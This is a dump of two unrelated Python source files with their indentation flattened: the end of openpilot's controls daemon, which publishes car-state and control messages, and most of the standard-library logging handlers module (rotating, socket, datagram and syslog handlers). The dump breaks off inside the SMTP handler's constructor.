controlsState.upAccelCmd = float(self.LoC.pid.p)
controlsState.uiAccelCmd = float(self.LoC.pid.id)
controlsState.ufAccelCmd = float(self.LoC.pid.f)
controlsState.angleSteersDes = float(self.LaC.angle_steers_des)
controlsState.vTargetLead = float(v_acc)
controlsState.aTarget = float(a_acc)
controlsState.jerkFactor = float(self.sm['plan'].jerkFactor)
controlsState.gpsPlannerActive = self.sm['plan'].gpsPlannerActive
controlsState.vCurvature = self.sm['plan'].vCurvature
controlsState.decelForModel = self.sm['plan'].longitudinalPlanSource == LongitudinalPlanSource.model
controlsState.cumLagMs = -self.rk.remaining * 1000.
controlsState.startMonoTime = int(start_time * 1e9)
controlsState.mapValid = self.sm['plan'].mapValid
controlsState.forceDecel = bool(force_decel)
controlsState.canErrorCounter = self.can_error_counter
if self.CP.lateralTuning.which() == 'pid':
controlsState.lateralControlState.pidState = lac_log
elif self.CP.lateralTuning.which() == 'lqr':
controlsState.lateralControlState.lqrState = lac_log
elif self.CP.lateralTuning.which() == 'indi':
controlsState.lateralControlState.indiState = lac_log
self.pm.send('controlsState', dat)
# carState
car_events = self.events.to_msg()
cs_send = messaging.new_message('carState')
cs_send.valid = CS.canValid
cs_send.carState = CS
cs_send.carState.events = car_events
self.pm.send('carState', cs_send)
# carEvents - logged every second or on change
if (self.sm.frame % int(1. / DT_CTRL) == 0) or (self.events.names != self.events_prev):
ce_send = messaging.new_message('carEvents', len(self.events))
ce_send.carEvents = car_events
self.pm.send('carEvents', ce_send)
self.events_prev = self.events.names.copy()
# carParams - logged every 50 seconds (> 1 per segment)
if (self.sm.frame % int(50. / DT_CTRL) == 0):
cp_send = messaging.new_message('carParams')
cp_send.carParams = self.CP
self.pm.send('carParams', cp_send)
# carControl
cc_send = messaging.new_message('carControl')
cc_send.valid = CS.canValid
cc_send.carControl = CC
self.pm.send('carControl', cc_send)
# copy CarControl to pass to CarInterface on the next iteration
self.CC = CC
def step(self):
start_time = sec_since_boot()
self.prof.checkpoint("Ratekeeper", ignore=True)
# Sample data from sockets and get a carState
CS = self.data_sample()
self.prof.checkpoint("Sample")
self.update_events(CS)
if not self.read_only:
# Update control state
self.state_transition(CS)
self.prof.checkpoint("State transition")
# Compute actuators (runs PID loops and lateral MPC)
actuators, v_acc, a_acc, lac_log = self.state_control(CS)
self.prof.checkpoint("State Control")
# Publish data
self.publish_logs(CS, start_time, actuators, v_acc, a_acc, lac_log)
self.prof.checkpoint("Sent")
def controlsd_thread(self):
while True:
self.step()
self.rk.monitor_time()
self.prof.display()
def main(sm=None, pm=None, logcan=None):
controls = Controls(sm, pm, logcan)
controls.controlsd_thread()
if __name__ == "__main__":
main()
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
namer = None
rotator = None
def __init__(self, filename, mode, encoding=None, delay=False, errors=None):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.mode = mode
self.encoding = encoding
self.errors = errors
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding=encoding,
delay=delay, errors=errors)
self.maxBytes = maxBytes
self.backupCount = backupCount
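# Usage sketch (an assumption, not part of this module): roll over near
# 1 MiB and keep app.log.1 .. app.log.5 as backups.
#   handler = RotatingFileHandler('app.log', maxBytes=1048576, backupCount=5)
#   logging.getLogger().addHandler(handler)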
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2)  # due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None,
errors=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding=encoding,
delay=delay, errors=errors)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
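# Usage sketch (an assumption, not part of this module): rotate nightly at
# midnight and keep a week of dated backups.
#   handler = TimedRotatingFileHandler('app.log', when='midnight', backupCount=7)
#   logging.getLogger().addHandler(handler)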
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False,
errors=None):
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
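# With the defaults above, successive retry delays are 1s, 2s, 4s, 8s, 16s,
# then 30s thereafter (retryStart * retryFactor**n, capped at retryMax).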
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
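# Receiving-end sketch (an assumption; pairs with logging.makeLogRecord,
# and a robust reader would loop until each recv() length is satisfied):
#   raw = conn.recv(4)
#   slen = struct.unpack('>L', raw)[0]
#   data = conn.recv(slen)
#   record = logging.makeLogRecord(pickle.loads(data))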
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
LOG_NTP = 12 # NTP subsystem
LOG_SECURITY = 13 # Log audit
LOG_CONSOLE = 14 # Log alert
LOG_SOLCRON = 15 # Scheduling daemon (Solaris)
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"console": LOG_CONSOLE,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"ntp": LOG_NTP,
"security": LOG_SECURITY,
"solaris-cron": LOG_SOLCRON,
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it is no worse
# to ignore them during initialisation as well.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
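    # Worked example: encodePriority(LOG_USER, LOG_WARNING) gives
    # (1 << 3) | 4 == 12, so such a message is sent with the prefix "<12>".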
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
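# A minimal usage sketch for SysLogHandler (assumes a syslog daemon is
# listening on the local UDP port; the logger name "myapp" is illustrative):
#
#     import logging
#     handler = SysLogHandler(address=('localhost', SYSLOG_UDP_PORT))
#     logger = logging.getLogger('myapp')
#     logger.addHandler(handler)
#     logger.warning('disk almost full')  # sent with priority prefix <12>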
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
        A timeout in seconds can be specified for the SMTP connection (the
        default is 5 seconds).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
